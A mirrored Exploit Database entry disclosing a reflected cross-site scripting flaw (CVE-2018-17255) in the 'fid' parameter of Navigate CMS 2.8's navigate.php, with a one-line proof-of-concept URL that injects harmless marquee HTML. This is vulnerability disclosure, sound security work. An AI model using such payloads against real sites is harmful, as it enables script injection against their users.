Navigate CMS 2.8 – Cross-Site Scripting

• Exploit Database
• 37 阅读

• 作者： Renzi
  日期： 2018-09-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45445/

• # Title: Navigate CMS 2.8 - Cross-Site Scripting 
  # Author: Felipe "Renzi" Gabriel
  # Date: 2018-09-19
  # Vendor: https://www.navigatecms.com/en/home
  # Software: Navigate CMS 2.8
  # CVE: CVE-2018-17255
  
  # Technical Details & Description:
  # A Reflected Cross-Site Scripting web vulnerability has been discovered in the "Navigate CMS" web-application.
  # The vulnerability is located in the 'fid' parameter of the`navigate.php` action GET method request.
  
  # PoC
  
  http://Target/navigate/navigate.php?fid=files"><marquee>RENZI</marquee>